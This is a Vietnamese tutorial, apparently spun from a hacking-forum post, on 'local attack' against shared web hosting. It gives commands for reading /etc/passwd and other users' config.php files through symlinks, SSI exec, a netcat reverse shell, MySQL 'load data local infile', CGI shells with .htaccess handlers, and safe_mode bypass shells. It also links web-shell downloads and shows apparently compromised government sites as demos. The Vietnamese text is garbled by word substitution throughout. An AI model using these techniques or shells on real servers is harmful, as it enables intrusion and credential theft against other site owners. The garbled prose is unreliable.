Local attack là gì

Để ngừng bộ tut Local Attack full, bây giờ Soleil đang trình làng bài 3, cũng chính là bài quan trọng đặc biệt cùng trung tâm nhất trong Local Attaông chồng. Trước Lúc đi vào bài xích 3, những bạn cũng có thể gọi qua cùng rước một số tool cần thiết từ bỏ bài xích 2 – Giới thiệu khả năng một số ít shell


​* Nhắc lại trình từ quá trình Local Attack1- View danh sách các user trong server2- Tìm tệp tin config.php3- Get biết tin login vào database4- Crack hoặc change pass admin5- Login vào quyên ổn quản ngại trị với upshell

1- View danh sách những user bên trên serverMuốn local được một site nào đó trên hệ thống thì trướ tiên cần phải xác định site đó có user là gì, source code là gì tự đó tìm kiếm bí quyết phát âm tệp tin config.php của user đó– Một số câu lệnh nhằm get user:Lệnh thịnh hành nhất:


Ngoài ra hoàn toàn có thể áp dụng công dụng get user bên trên shell byg.php, c99.php giỏi bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:http://www.mediafire.com/?gic70c6ce441333http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)http://www.mediafire.com/?2rk42hiv9b4ii3fPass download: soleil_vhbPass dải nén: ceh.vn– Câu lênh get user & domain


2- Tìm tệp tin path tệp tin config.phpĐối cùng với những mã nguồn msinh sống thì path tệp tin config được mang định nhỏng sau:Lưu ý: “path” chính là path tự server dẫn đến site, ví dụ so với VPS linux, path là: /home/user/public_html


– Vbulletin:path/includes/config.php– Mybb:path/inc/config.php– Joomla:path/configuration.php– Word-Press:path/wp-config.php– Ibp:path/conf_global.php– Php-fusion:path/config.php– Smf:Path/Settings.php– Nuke:path/config.php– Xoops:path/maintệp tin.php– Zen CartPath/includes/configure.php– path/setidio:path/datas/config.php– Datalife Engine:path/engine/data/config.php – Phpbb:Path/config.php– wpuonline.com: path/wp-config.php– Seditio:path/datas/config.php– Drupal:path/sites/default/settings.php​

– Discuzpath/config/config_ucenter.php– Bo-Blogpath/data/config.php– Đây là path khoác định so với những mã nguồn msinh sống, còn đối với site từ code thì thông thường path vẫn đặt hay ngay lập tức sau thư mục public_html ( path/config.php ).– Đối cùng với những quản trị viên chăm chú mang đến hào kiệt bảo mật thông tin, phòng tách local attachồng thì họ hay lốt kỹ với biến đổi path dẫn mang đến tệp tin config, trong trường thích hợp này cần được dò path bắt đầu từ bỏ file index đi vào. Soleil sẽ lấy ví dụ dò path tệp tin config so với vbulletin chẳng hạn:


Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php​

( Để tìm kiếm tìm path trong source, search theo từ khóa: “cwd”, ta vẫn thấy đoạn code tương tự như: “require_once(CWD . ‘/includes/init.php’);” – Đây là path khoác định dẫn đến tệp tin init.php))……3- Get báo cáo file configPhần này đó là phần giữa trung tâm duy nhất trong bộ tut local attack. Trong phần này soleil sẽ ra mắt vừa đủ những nghệ thuật cơ bạn dạng nhằm local attack.3.1- Trước không còn ta yêu cầu tò mò qua về các câu lệnh cơ bạn dạng trong linux áp dụng cho local attck:– Ls , dir : Liệt kê tên những tệp tin bên trong tlỗi mụcls -al, ls -lia: Liệt kê thương hiệu và nằm trong tính những file bên trong tlỗi mục


Ls -lia /home/vhbgroup/public_html/
4rum/includes.config.php​

– Cat, ./cát, less, more, tail : View nôi dung phía bên trong các file:


Cat /home/vhbgroup/public_html/
4rum/includes/config.php​

– Ln : Lệnh symbolic link:


Ln -s /home/vhbgroup/public_html/
4rum/includes/config.php soleil.ini​

– Cd: Chuyển đổi tlỗi mụclấy ví dụ hy vọng đưa cho tới thư mục soleil”


Cd /home/vhbgroup/public_html/
4rum/includes/soleilcd ~ : Tới tlỗi mục home dictionarycd -: Quay lại thỏng mục vừa làm việccd ..: Tới thỏng mục kề bên ko kể thỏng mục vẫn có tác dụng việc​

– Chmod: Phân quyền cho các file hoặc tlỗi mục:


Chthủ thuật 400 config.php ( sẽ thao tác làm việc vào tlỗi mục includes đựng tệp tin config.php )​

– Mkdir: sản xuất thỏng mục:Ví du mong tạo tlỗi mục soleil vào thư mục includes:


Mkdir /home/vhbgroup/public_html/
4rum/includes/soleil ​

– cảm ứng : Tạo file:


touch /home/vhbgroup/public_html/
4rum/includes/soleil.php ​

– Tar, zip: Lệnh nén với giải nén: hay sử dụng vào symlinks root


Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thỏng mục soleil thành tệp tin ducdung08clc.tar.gz)Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)​
Zip –r -9 ducdung08clc.zip soleil ( Nén tlỗi mục soleil thành tệp tin ducdung08clc.zip)Zip -p ducdung08clc.zip ( Giải nén tệp tin ducdung.tar.gz)​

…………3.2-Phần tiếp theo Soleil đang trình diễn 1 số ít kỹ thuật sử dụng để mang thông báo file config.php1- Sử dụng các lệnh mèo, dir để thấy tên tlỗi mục, tệp tin cùng gọi nội dung tệp tin.Ví dụ:


dir /home/vhbgroup/public_html/includesmèo /home/vhbgroup/public_html/includes/config.php​

Nhưng bây chừ đa phần các hệ thống hầu hết không cho phép thực thi mọi hàm này buộc phải ứng dụng phương pháp này sẽ không mấy khả thi2- Sử dụng Symbolic links – điện thoại tư vấn tắt là symlinkSymbolic liên kết là chuyên môn cơ bản cùng gần như là đặc biệt quan trọng cơ mà đa số các attaker nghĩ về cho thứ nhất trước khi triển khai công việc local attaông chồng.

Bạn đang xem: Local attack là gì


Ln -s /home/vhbgroup/public_html/
4rum/includes/config.php soleil.ini​

cũng có thể đọc đơn giản dễ dàng là tạo nên 1 tệp tin soleil.ini trên host bao gồm câu chữ như thể file config.php của user vhbgroup bên trên server tất cả path /home/vhbgroup/public_html/
4rum/includes/config.phpCó thể cố soleil.ini bởi .txt tuy nhiên bởi thói quen soleil vẫn hay sử dụng .ini rộng chính vì so với 1 số server bị lỗi nó có thể bypass permissions 400.3- Sử dụng symlinks kết hợp với ssi:Đối với 1 sô VPS khi symboliông xã link bình thường xuất hiên 403 forbinden – không chất nhận được gọi file đã làm được symliên kết thì giải pháp được nghĩ về mang lại chính là kết phù hợp với sđam mê.– Tạo 1 file ducdung08clc.shtml cùng với câu chữ nhỏng sau:


include virtual=”soleil.ini”–>​

Trong đó tệp tin soleil.ini là tệp tin đã có được symbolic links bên trên hệ thống.Bây tiếng view source của tệp tin ducdung08clc.shtml ta sẽ thấy được ngôn từ file soleil.ini đã symbolic links.4- Chạy lệnh bằng file .shtml– Tuy nhiên có 1 số hệ thống cả hai từ thời điểm cách đó phần đông không áp dụng được nhưng này lại đến chạy lệnh bằng tệp tin .shtml


exec cmd=”cát /etc/passwd”–>​

– Lệnh coi tệp tin logs nhỏng sau:


exec cmd=”tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log”–>​

Lưu ý: + lệnh tail tương tự như lệnh mèo nhưng lại nó dùng làm coi tuy nhiên chiếc cuối cùng của tệp tin trên VPS. + /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn mang đến file error.log của direct admin + Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy theo cỗ cài host cơ mà path dẫn mang đến tệp tin error.log khác biệt.5- Get all config toàn server– Đâu tiên tải về shell get all config ( w.php) về rồi up lên hệ thống.http://www.mediafire.com/?hi4gnmu3kpxn095 ( pass unlock: soleil_vhb )


*

– Cliông xã vào done và thư mục mang tên là tmp sẽ tiến hành tạo ra.– Vào links của thỏng mục tmp sẽ có một số shell với những tính năng sau:+ dz.sa : Đây là shell cgi, sử dụng nó nhằm get những user trên server bằng phương pháp thực hiện câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).+ user.sa : Shell này dung để thấy danh sách những user với domain trên server.+ config.sa : Shell này còn có trách nhiệm thực hiện get all config bởi phương thức symlink

*
– Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa

– Coppy cục bộ báo cáo user đã đạt được từ câu lệnh: cát /etc/passwd vào size như hình hình họa dưới đây rồi ấn “get config”


*

– Cuối cùng trở về links http://vksbinhphuoc.gov.vn/soleil/tmp/ , chúng ta sẽ sở hữu được danh sách các tệp tin config của các site trên hệ thống.

Xem thêm: Cách Xem Ai Đang Theo Dõi Mình Trên Fb, Cách Biết Ai Theo Dõi Mình Trên Facebook


*

* Điểm sáng của nhỏ shell get all config này:+ Là 1 chính sách cực kỳ thuận tiện, giảm bớt thời gian và sức lực lao động Lúc local attack+ Chỉ thực hiện so với những server cho chạy shell cgi cùng mang đến quyền symlink+ Không bypass được, chỉ symliên kết đối với các site không chmod và có path dẫn cho file config là mang định.

Xem thêm: Tuyển Tập Bộ Hình Nền Động Cho Điện Thoại Với Chủ Đề Tình Yêu

6- Symboliên kết Root:– Download tệp tin r00t.tar.gz về với upload lên host:http://www.mediafire.com/?21kycoh4g5s4ojo ( pass download: soleil_vhb, pass dải nén: ceh.vn )– Sau đó giải nén file root.tar.gz, áp dụng lệnh sau:


Tar –zxvf r00t.tar.gz​

– Up file .htacess cùng tlỗi mục với tệp tin r00t:


Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any​

– Nếu không sủ dụng file r00t.tar.gz kia, có thể thực hiện sym root ngay lập tức trên shellDemo:http://tnmthatinh.gov.vn/soleil/r00t/

Và đấy là cấu trúc của ngôi trường http://cdhh.edu.vn/http://tnmthatinch.gov.vn/soleil/r00t/home/cdhh/public_html/

7- Backconnet:cũng có thể hiểu đơn giản và dễ dàng là kết nối bởi cổng sau, nghĩa là sử dụng shell backconnet với tool netcat (nc.exe) nhằm mnghỉ ngơi sẵn chỉ một cổng bên trên hệ thống, tiếp đến trường đoản cú máy vi tính của attacker liên kết cùng với hệ thống qua cổng đã làm được msinh hoạt sẵn kia. Mọi câu lệnh thực hiện so với server có thể triển khai trên máy tính xách tay của attacker qua comm& line.Đồ nghề yêu cầu thiết:– Tool netcat (nc.exe)http://www.mediafire.com/?npsob8c7dd9nr40– Shell baông xã connect so với asp:http://www.mediafire.com/?etciiuskzvyhjcwChụ ý, trong shell có 1 đoạn code như: “G:domains vled.vnwwwrootaustdoordesign c.exe -l -p 1234 -e cmd.exe pháo -d”Lúc up shell lên bắt buộc edit lại “G:domains vled.vnwwwrootaustdoordesign” thành path của hệ thống dẫn đến file nc.exe.– Shell backconnet so với phphttp://www.mediafire.com/?8o1sj35cs51lsiw( Pass unloông chồng soleil_vhb; Pass dải nén: ceh.vn )– Download tool nc.exe cộ rồi đặt vào ổ C chẳng hạn, sau đó Open sổ command line và sử dụng netmèo để msinh hoạt cổng bên trên local host liên kết cùng với VPS vẫn msống sẵn cổng– Cú pháp: + chính sách kết nối : nc <-tùy_chọn> tên_đồ vật cổng1<-cổng2>+ chế độ lắng nghe: nc -l -p cổng <-tùy_chọn> Một số câu lệnh hoàn toàn có thể sử dụng:


nc -nvv -l -p 80nc -lvvnp 3333nc -nvv -l -p 12345nc 127.0.0.1 7777nc -vv -l -p 7777nc -vlp 443​

+ –l: đặt netcát vào cơ chế lắng tai để chề kết nối cho + -n: Chỉ sử dụng ip sinh sống dang số, ví dụ: 123.30.2.42, netcát vẫn ko xét đến DNS.+ -p: Chỉ định cổng buộc phải lắng tai giỏi kết nối+ -v: Hiện thi các thông tin về kết nối ngày nay. –vv đã hiện lên thông báo chi tiết không chỉ có thế.– Lưu ý là đề xuất xào luộc nc.exe vào 1 địa chỉ làm sao trong máy rồi thực hiện comm& mang đến tlỗi mục chứa nc.exe trước khi triển khai những câu lệnh liên quan mang lại netcat– Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bởi 1 câu lệnh sao chép shell trường đoản cú site đã up được shell tới site victyên ổn.8- Via SQL– Login vào database cùng tạo 1 table để load các lên tiếng bằng cách sử dụng querry saucreate table soleil ( ducdung08clc varchar (1024));– Query load những thông tin vào table table vừa được tạo:load data local intệp tin ‘/etc/passwd’ inlớn table soleilCó thể rứa câu lệnh “/etc/passwd” bằng path dẫn cho tệp tin config.– Query hiện thị các báo cáo được load vào table soleil:select * from soleil– Phương thơm pháp này được điện thoại tư vấn là Via SQL, đa số áp dụng Khi VPS quán triệt chạy run commvà cùng rất có thể bypass đối với 1 số server.1 số ít lưu giữ ý: – Đối với một số VPS Safe_mod: ON, thì shel không có tác dụng run command nhằm xúc tiến những câu lệnh, vậy làm sao hoàn toàn có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi:

*
+ Soleil.pinhttp://www.mediafire.com/?4k94v1i0shmr46c

Cách sử dụng:– Up shell soleil.pin với chmod nó về 755– Up hoặc chế tác file .htaccess vào thư mục cất shell tất cả nội dung:


## START ##Options +ExecCGIAddHandler cgi-script cgi pl cgi gmc pin jpgRewriteEngine onRewriteRule (.*).mil$ $1.cgiOptions +FollowSymLinks DirectoryIndex cmd.html Options +IndexesRemoveHandler .hackAddType text/plain .hack## milw0rmvn exploit ##

Hoặc:Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .cin

AddHandler cgi-script .pinAddHandler cgi-script .pin​
+ telnet.plhttp://www.mediafire.com/?t9cavs1n0ipthq1

shell telnet.pl tất cả công dụng trọn vẹn tương tự cùng với bé shell soleil.pin. Tuy nhiên cách thức áp dụng nó thì đơn giản rộng nhiều vì không phải thực hiện mang lại tệp tin .htaccess mà chỉ cần chgian lận nó về 755 là chạy được.

*
( Pass unlock: soleil_vhb, pass dải nén ví như tất cả : ceh.vn )– * Đối với những hệ thống không tồn tại tác dụng run command cùng cũng không cho chạy shell cgi thì hoàn toàn có thể thực hiện các shell sau nhằm bypass đơn giản và dễ dàng đối với một số hệ thống.+ fakesymlink.phphttp://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )+ 529bypass.phphttp://www.mediafire.com/?cls0e5k873w83ef+ Bypassnull.phphttp://www.mediafire.com/?1x0zxmig5ctwezr

+ Hoặc sử dụng safe mode bypasshttp://www.mediafire.com/tải về.php?38d13jgqw132db2

+ Sử dụng các tính năng bypass trên bé shell r57vip này ( buộc phải convert tên miền quý phái dạng ip)http://www.mediafire.com/?sqjs5du3srlifqt

+ Hoặc thực hiện via sqliv.v….(Tất cả các shell tải về trên đều phải sở hữu pass unlock: vhb_soleil với pass dải nén giả dụ có: ceh.vn)Trong bài bác tut bên trên soleil sẽ giới các phương thức local attack cơ bản với các dạng bypass cơ bản độc nhất hoàn toàn có thể áp dụng. Trong bài xích tiếp sau soleil đang đề cập đến các dạng bypass cải thiện so với một số ít hệ thống khó khăn, các mẹo nhỏ vượt chmod qua 400 permission, chiếm phần quyền điều khiển root (get root) với các kỹ thuật up shell so với một số ít mã nguồn msinh sống như: joomla, worpress, nukeviet, vbulletin, drupal……

Nguồn http://website.archive sầu.org/web/20150423012615/http://root.vn/threads/tong-hop-cac-phuong-phap-local-attack-thuong-dung.2834/


Chuyên mục: Hosting